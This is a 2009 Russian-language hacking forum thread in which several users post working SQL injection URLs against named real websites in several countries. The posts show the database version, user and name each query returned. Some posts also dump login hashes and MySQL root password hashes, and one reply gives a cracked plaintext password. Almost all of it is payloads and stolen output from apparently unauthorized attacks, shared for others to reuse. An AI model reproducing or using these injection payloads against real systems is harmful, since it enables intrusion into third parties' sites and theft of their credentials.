ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8121  
Старый 03.03.2009, 09:50
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

На обеде пробежался....

Цитата:
http://www.malagacar.co.uk/carhire/details.php?ID=2798798698768+union+select+1,2,3,4, 5,6,7,8,9,10,11,concat_ws(0x3a,version(),user(),da tabase())--
Version:5.0.45
User:malagaca_malagac@localhost
Database:malagaca_malagacar



Цитата:
http://www.info-please.co.uk/cities.php?id=1678968753377+union+select+1,concat_ ws(0x3a,version(),user(),database()),3,4,5,6,7,8--

Version:5.0.67-community-log
User:nutriadv_mihai@localhost
Database:nutriadv_infoplease



Цитата:
http://www.thelandofgrimney.co.uk/stories.php?ID=68979875528+union+select+1,concat_w s(0x3a,version(),user(),database()),3,4,5,6,7,8,9, 10,11,12,13,14,15,16--

Version:5.0.67
User:gavin@localhost
Database:thelandofgrimney_co_uk_maindb


Цитата:
http://www.techawards.org/laureates/stories/index.php?id=18809570980984+union+select+1,concat_ ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21--

Version:5.0.32-Debian_7etch8-log
User:thetech@10.2.1.28
Database:tt_TECH_AWARDS
 
Ответить с цитированием

  #8122  
Старый 03.03.2009, 10:14
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.oil-city.ru/new_detail.php?id=-1+union+select+concat_ ws(0x3a,version(),database(),user()),2,3--
Database Version : 4.1.22-standard
Database name : wd40ru_oil
User name : wd40ru_oilweb@localhost


-------------------------------------------------------+


Код:
http://www.profshina.ru/index.php?page=9005001&tmpl=7&nbid=1&newsid=-1+union+select+concat_ ws(0x3a,version(),database(),user())--
Database Version : 4.1.22
Database name : db_roman056_1
User name : dbu_roman056_2@192.168.9.95
 
Ответить с цитированием

  #8123  
Старый 03.03.2009, 17:31
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.thaigolfer.com/ranges/rangedetail.phtml?id=-999999+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
user():database():version()
golfer@localhost:golfer:4.0.21-log


Там есть еще табличка user, но колонок подобрать не смог...
 
Ответить с цитированием

  #8124  
Старый 03.03.2009, 20:44
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.turistka.ru/altai/mail.php?firm=-1%20union%20select%20username,user_password,3,4%20 from%20bb_users%20limit%201,1--
SAN
d32f227fabf9c471fcceb0f12d8a626d (Нужно расшифровать с меня +_)
pr 4
 
Ответить с цитированием

  #8125  
Старый 03.03.2009, 20:52
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.tot.biz.ua/ru/news/?cid=32&nid=-1+union+select+1,2,3,4,5,concat _ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
Database Version : 5.0.75
Database name : totbiz
User name : totbizua@localhost


юзверь:

Код:
http://www.tot.biz.ua/ru/news/?cid=32&nid=-1+union+select+1,2,3,4,5,concat _ws(0x3a,login,pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+va cuums_users+limit+0,1--
Код:
marina:f1ac4a2e174b0a964a821f3826c35be3

----------------------------------------------------------+

Масло Hado

Код:
http://www.hado.ru/index.php?we=novosti&wt=-1+union+select+1,concat_ ws(0x3a,version(),database(),user()),3--
Database Version : 4.1.22-log
Database name : www1vclggru_hado
User name : z1vc01_hado@fe65.hc.ru
 
Ответить с цитированием

  #8126  
Старый 03.03.2009, 21:37
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Вот сеово небольшой сбор скулей by me
Налетай как говорица
Код:
http://www.deluthiers.com/es/category.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4,5--
юзер/версия/бд:

Код:
4.1.22-standard:luthier_luthier@localhost:luthier_deluthiers
-----------------------------------------------------------------

Код:
http://www.educationsante.be/es/article.php?id=-1+union+all+select+0,1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7--
юзер/версия/бд:

Код:
5.0.44-log:educatio@localhost:educatio
---------------------------------------------------------------

Код:
http://www.mammaparliamodidoping.it/post.php?ID=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3--
юзер/версия/бд:


Код:
4.0.25-log:mpdd@localhost:devmpdd
-----------------------------------------------------------------

Код:
http://www.marmaglia.it/post.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7--
юзер/версия/бд:

Код:
4.1.22-standard:marmagli_user@localhost:marmagli_marmaglia
-------------------------------------------------------------------

Код:
http://www.univs.cn/univs/xidian/it/read.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5--
юзер/версия/бд:

Код:
4.0.26-log:xidian@localhost:ucnews
-------------------------------------------------------------------

Код:
http://www.maipiudivisi.it/read.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4--

юзер/версия/бд:

Код:
4.0.11a-gamma:maui@151.1.152.166:maipiudivisi
----------------------------------------------------------------


Код:
http://www.laboratorioclinicopedagogico.it/curriculum.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4,5--

юзер/версия/бд:

Код:
4.0.22-debug:illaboratorio@localhost:laboratorio
-------------------------------------------------------------------


Код:
http://esterproductions.it/curriculum.php?ID=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database())--
юзер/версия/бд:

Код:
5.0.51a-3ubuntu5.4:ester@localhost:esterproductions_db1
----------------------------------------------------------------------


Код:
http://www.sptcomo.it/newsDetail.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9--
юзер/версия/бд:


Код:
4.1.22-standard:sptcoit_go38ty71@localhost:sptcoit_sf33tR3
----------------------------------------------------------------------


Код:
http://www.comune.poirino.to.it/readnews.php?id=-1+union+all+select+0,1,2,convert(concat_ws(0x3a,version(),user(),database())+using+latin1),4,5--
юзер/версия/бд:

Код:
4.1.16-standard-log:Nick1@66.71.190.34:031492Nick
--------------------------------------------------------------------
The End!
 
Ответить с цитированием

  #8127  
Старый 03.03.2009, 22:11
erihtoney
Познающий
Регистрация: 03.03.2009
Сообщений: 86
Провел на форуме:
994199

Репутация: 258
Отправить сообщение для erihtoney с помощью ICQ
По умолчанию

Код:
http://www.constant.ru/index.php?itemMenu=curorts&idcountry=5+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14+--
Код:
http://www.constant.ru/index.php?itemMenu=curorts&idcountry=5+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14+--
Код:
http://www.constant.ru/index.php?itemMenu=curorts&idcountry=5+union+select+1,2,database(),4,5,6,7,8,9,10,11,12,13,14+--
version : 4.0.26-log
user : constant@localhost
database : constant_ru

______________________________

Код:
http://www.metalportal.com.ua/gost.php?action=open&id=-3+union+select+1,version()
Код:
http://www.metalportal.com.ua/gost.php?action=open&id=-3+union+select+1,user()
Код:
http://www.metalportal.com.ua/gost.php?action=open&id=-3+union+select+1,database()
version : 4.1.22-standard 1
user : metalpor_metalpo@localhost 1
database : metalpor_clients 1
PS: Вывод осуществляется в загаловке страницы

______________________________

Российская национальная горнолыжная школа

Код:
http://ski.stel.ru/rus/forage.shtml?id=1+union+select+1,2,concat_ws(0x20203a3a2020,user(),version(),database()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8

user: arasia@localhost
version: 4.1.22
database: skivagi

______________________________


Код:
http://www.maer-sport.ru/news/index.php?id=-12+union+select+1,2,concat_ws(0x20203a3a2020,user(),version(),database()),4,5/*
user: maerspo1_sport@localhost
version: 4.1.22-log
database: maerspo1_maer

______________________________
Код:
http://www.srg.com.bs/news.php?id=-5+union+select+1,2,3,4,concat_ws(0x20203a3a2020,user(),version(),database()),6,7,8,9,10,11,12,13&type=news&cmd=display
user: indigo_admin@localhost
version: 4.0.23-debug
database: indigonetworks

Собственно пассы:
Код:
http://www.srg.com.bs/news.php?id=-5+union+select+1,2,3,4,user,password,7,8,9,10,11,12,13+from+mysql.user--&type=news&cmd=display
root 457265956b0a4b08
root 67e919553dd7e948
indigo_admin 1f5f0cb349d22d64
 
Ответить с цитированием

  #8128  
Старый 03.03.2009, 22:55
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

www.drgas.net PR=3


Код:
https://www.drgas.net/catalog.php?catid=3+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6--
version: 4.1.22-max-log
user: drgas_maindb@64.202.163.140
database: drgas_maindb

--------------------------------------------------------------


www.terainvest.com PR=2


Код:
http://www.terainvest.com/catalog.php?catid=4+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10--
version: 4.0.27-log
user: u2462@localhost
database: u2462

Последний раз редактировалось jokester; 04.03.2009 в 01:10.. Причина: autoteatr.ru БОЯН
 
Ответить с цитированием

  #8129  
Старый 04.03.2009, 00:44
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://lemonburst.biz/display.php?id=206/**/UNION/**/SELECT/**/1,02,3,4,5,6,7,8,9,10,11,12,13,14/*
Database Version: 4.1.22
Database name: stewsk867
User name: stewsk867@10.6.0.10

2 Assembler
d32f227fabf9c471fcceb0f12d8a626d:sss113
 
Ответить с цитированием

  #8130  
Старый 04.03.2009, 01:10
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://yoky-lib.com/vb.php?id=-1+union+select+1,2,3,4,5,6,7,8,column_name,10+from+information_schema.columns+where+table_name=0xa5e3eba5/*
там чета про пшп, вб етк..
5 версия..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ